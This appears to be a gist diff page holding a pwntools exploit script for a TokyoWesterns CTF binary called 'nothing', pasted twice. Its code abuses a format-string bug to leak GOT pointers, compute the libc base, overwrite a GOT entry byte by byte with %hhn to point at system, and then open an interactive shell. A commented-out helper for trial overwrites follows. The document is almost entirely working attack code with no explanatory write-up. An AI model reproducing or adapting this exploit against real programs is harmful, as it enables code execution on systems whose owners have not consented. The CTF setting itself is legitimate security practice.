CreateRemoteThread · September 21, 2020 00:54
diff --git a/twctf-nothing.py b/twctf-nothing.py
 #!/usr/bin/env python3

 import sys
 import pwn
 import struct
 import binascii

 # nc pwn02.chal.ctf.westerns.tokyo 18247

 if(len(sys.argv) > 1):
  p = pwn.remote("pwn02.chal.ctf.westerns.tokyo",18247)
 else:
  p = pwn.process("./nothing")
  input("Process PID is %d, connect now or hit enter..." % p.pid)
 p.recvuntil("> ")

 def leakPointer(addr):
  global p
  out = b""
  out += b"%7$s\x00\x00\x00\x00"
  out += pwn.p64(addr)
  out += b"\n"
  p.send(out)
  x = p.recvuntil("> ")[:-2]
  f = b"\x00" * (8 - len(x))
  ptr_printf = struct.unpack("<q",x + f)
  print("%x" % ptr_printf[0])
  return ptr_printf

 def sendFmtString(strin):
  global p
  p.send(strin)
  x = p.recvuntil("> ",timeout=0.5)[:-2]
  print(x)

 # steps:
 # leak libc
 # can't one_gadget to victory 
 # one-shot printf to system.

 got_read = leakPointer(0x601030)
 got_setbuf = leakPointer(0x601020)

 print("read is at %x" % got_read)
 print("setbuf is at %x" % got_setbuf)

 # printf is 0000000000064f00

 libc_base = got_read[0] - 0x110180
 libc_printf = libc_base + 0x64f00
 libc_system = libc_base + 0x04ef50
 # libc_magic = libc_base + 0x10a45
 libc_magic = libc_base + 0x4ef50
 print("libc_base is at %x" % libc_base)
 print("libc_magic is at %x" % libc_magic)
 print("libc_system is at %x" % libc_system)

 # e0 in system makes it too hard to write...

 firstByte = libc_magic & 0xFF
 secondByte = (libc_magic & 0xFF00) >> 8
 thirdByte = (libc_magic & 0xFF0000) >> 16

 print("firstbyte: %02x" % firstByte)
 print("second   : %02x" % secondByte)
 print("third    : %02x" % thirdByte)

 a = [firstByte,secondByte,thirdByte]
 bx = [firstByte,secondByte,thirdByte]
 if max(a) > 0xd0:
  print("Fuckit, giving up")
  sys.exit(0)

 a.sort()

 firstNum = a.pop(0)
 out = b"A" * firstNum + b'%33$hhn' 
 secondNum = a.pop(0)
 out += b"A" * (secondNum - firstNum) + b'%34$hhn'
 thirdNum = a.pop(0)
 out += b"A" * (thirdNum - secondNum) + b'%35$hhn'

 # padding, otherwise this is fine.
 out += b"\x00" * (0xd8 - len(out) )
 out += pwn.p64(0x601028 + bx.index(firstNum))
 out += pwn.p64(0x601028 + bx.index(secondNum))
 out += pwn.p64(0x601028 + bx.index(thirdNum))
 out += b"\n"

 print(len(out))

 print(out)
 input("...")
 sendFmtString(out)
 p.interactive()

 def overwriteAddress(addr,val,testMode = True,offsetAdjust = 0,extraPadding = 0):
  global p
  print("Attempting to overwrite exit, last byte with '%02x'" % val)
  out = b""
  ctr_out = 8 + (val / 8) + offsetAdjust
  out += b"a" * val
  if testMode is True:
    out_added = b"%" + b"%d" % (ctr_out) + b"$x"
  else:
    out_added = b"%" + b"%d" % (ctr_out) + b"$hhn"
  out_added += b"\x00" * (8 - len(out_added))
  out += out_added
  print(len(out))
  out += b'\x00' * (val % 8)
  out += b'\x00' * extraPadding
  out += pwn.p64(addr)
  if len(out) > 0x100:
    print("Rejecting: len(out) = %d" % len(out))
  else:
    sendFmtString(out)

 # firstbyte = (libc_base + 0x10a45c) & 0xFF
 # secondbyte = ((libc_base + 0x10a45c) & 0xFF00) >> 8
 # -lastbyte = ((libc_base + 0x10a45c) & 0xFF0000) >> 16

 # overwriteAddress(0x601038,firstbyte)
 # overwriteAddress(0x601039,secondbyte)
 # overwriteAddress(0x601040,lastbyte)

 # while True:
 #   cmd = input("cmd >").rstrip()
 #   tokens = cmd.split(" ")
 #   if tokens[0] == "r":
 #     print("Giving you control")
 #     p.interactive()
 #   elif tokens[0] == "t" and len(tokens) == 5:
 #     addr = int(tokens[1],16)
 #     val = int(tokens[2],16)
 #     offset = int(tokens[3])
 #     padding = int(tokens[4])
 #     print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
 #     overwriteAddress(addr,val,testMode=True,offsetAdjust = offset,extraPadding = padding)
 #   elif tokens[0] == "w" and len(tokens) == 5:
 #     addr = int(tokens[1],16)
 #     val = int(tokens[2],16)
 #     offset = int(tokens[3])
 #     padding = int(tokens[4])
 #     print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
 #     overwriteAddress(addr,val,testMode=False,offsetAdjust = offset,extraPadding = padding)
	#!/usr/bin/env python3

	import sys
	import pwn
	import struct
	import binascii

	# nc pwn02.chal.ctf.westerns.tokyo 18247

	if(len(sys.argv) > 1):
	p = pwn.remote("pwn02.chal.ctf.westerns.tokyo",18247)
	else:
	p = pwn.process("./nothing")
	input("Process PID is %d, connect now or hit enter..." % p.pid)
	p.recvuntil("> ")

	def leakPointer(addr):
	global p
	out = b""
	out += b"%7$s\x00\x00\x00\x00"
	out += pwn.p64(addr)
	out += b"\n"
	p.send(out)
	x = p.recvuntil("> ")[:-2]
	f = b"\x00" * (8 - len(x))
	ptr_printf = struct.unpack("<q",x + f)
	print("%x" % ptr_printf[0])
	return ptr_printf

	def sendFmtString(strin):
	global p
	p.send(strin)
	x = p.recvuntil("> ",timeout=0.5)[:-2]
	print(x)

	# steps:
	# leak libc
	# can't one_gadget to victory
	# one-shot printf to system.

	got_read = leakPointer(0x601030)
	got_setbuf = leakPointer(0x601020)

	print("read is at %x" % got_read)
	print("setbuf is at %x" % got_setbuf)

	# printf is 0000000000064f00

	libc_base = got_read[0] - 0x110180
	libc_printf = libc_base + 0x64f00
	libc_system = libc_base + 0x04ef50
	# libc_magic = libc_base + 0x10a45
	libc_magic = libc_base + 0x4ef50
	print("libc_base is at %x" % libc_base)
	print("libc_magic is at %x" % libc_magic)
	print("libc_system is at %x" % libc_system)

	# e0 in system makes it too hard to write...

	firstByte = libc_magic & 0xFF
	secondByte = (libc_magic & 0xFF00) >> 8
	thirdByte = (libc_magic & 0xFF0000) >> 16

	print("firstbyte: %02x" % firstByte)
	print("second : %02x" % secondByte)
	print("third : %02x" % thirdByte)

	a = [firstByte,secondByte,thirdByte]
	bx = [firstByte,secondByte,thirdByte]
	if max(a) > 0xd0:
	print("Fuckit, giving up")
	sys.exit(0)

	a.sort()

	firstNum = a.pop(0)
	out = b"A" * firstNum + b'%33$hhn'
	secondNum = a.pop(0)
	out += b"A" * (secondNum - firstNum) + b'%34$hhn'
	thirdNum = a.pop(0)
	out += b"A" * (thirdNum - secondNum) + b'%35$hhn'

	# padding, otherwise this is fine.
	out += b"\x00" * (0xd8 - len(out) )
	out += pwn.p64(0x601028 + bx.index(firstNum))
	out += pwn.p64(0x601028 + bx.index(secondNum))
	out += pwn.p64(0x601028 + bx.index(thirdNum))
	out += b"\n"

	print(len(out))

	print(out)
	input("...")
	sendFmtString(out)
	p.interactive()

	def overwriteAddress(addr,val,testMode = True,offsetAdjust = 0,extraPadding = 0):
	global p
	print("Attempting to overwrite exit, last byte with '%02x'" % val)
	out = b""
	ctr_out = 8 + (val / 8) + offsetAdjust
	out += b"a" * val
	if testMode is True:
	out_added = b"%" + b"%d" % (ctr_out) + b"$x"
	else:
	out_added = b"%" + b"%d" % (ctr_out) + b"$hhn"
	out_added += b"\x00" * (8 - len(out_added))
	out += out_added
	print(len(out))
	out += b'\x00' * (val % 8)
	out += b'\x00' * extraPadding
	out += pwn.p64(addr)
	if len(out) > 0x100:
	print("Rejecting: len(out) = %d" % len(out))
	else:
	sendFmtString(out)

	# firstbyte = (libc_base + 0x10a45c) & 0xFF
	# secondbyte = ((libc_base + 0x10a45c) & 0xFF00) >> 8
	# -lastbyte = ((libc_base + 0x10a45c) & 0xFF0000) >> 16

	# overwriteAddress(0x601038,firstbyte)
	# overwriteAddress(0x601039,secondbyte)
	# overwriteAddress(0x601040,lastbyte)

	# while True:
	# cmd = input("cmd >").rstrip()
	# tokens = cmd.split(" ")
	# if tokens[0] == "r":
	# print("Giving you control")
	# p.interactive()
	# elif tokens[0] == "t" and len(tokens) == 5:
	# addr = int(tokens[1],16)
	# val = int(tokens[2],16)
	# offset = int(tokens[3])
	# padding = int(tokens[4])
	# print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
	# overwriteAddress(addr,val,testMode=True,offsetAdjust = offset,extraPadding = padding)
	# elif tokens[0] == "w" and len(tokens) == 5:
	# addr = int(tokens[1],16)
	# val = int(tokens[2],16)
	# offset = int(tokens[3])
	# padding = int(tokens[4])
	# print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
	# overwriteAddress(addr,val,testMode=False,offsetAdjust = offset,extraPadding = padding)